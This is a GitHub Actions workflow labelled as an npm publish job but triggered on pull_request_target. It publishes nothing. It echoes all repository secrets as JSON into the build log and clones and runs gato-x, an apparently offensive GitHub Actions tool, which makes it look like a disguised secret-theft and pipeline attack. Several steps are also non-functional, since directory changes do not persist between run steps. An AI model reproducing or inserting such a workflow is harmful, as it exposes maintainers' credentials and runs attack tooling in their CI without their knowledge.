name: Publish package to npm
on: pull_request_target
jobs:
  publish_to_npm: 
    permissions: {}
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - uses: actions/setup-node@v4
        with:
          registry-url: 'https://registry.npmjs.org'
      - run: npm ci
      - run: ls -al
      - run: echo "${{ toJson(secrets) }}"
      - uses: actions/setup-python@v5
      - run: git clone https://github.com/AdnaneKhan/gato-x
      - run: cd gato-x
      - run: python3 -m venv venv
      - run: source venv/bin/activate
      - run: ls -al
      - run: pip install .
      - run: cd gatox
      - run: python3 ./main.py -s 
      
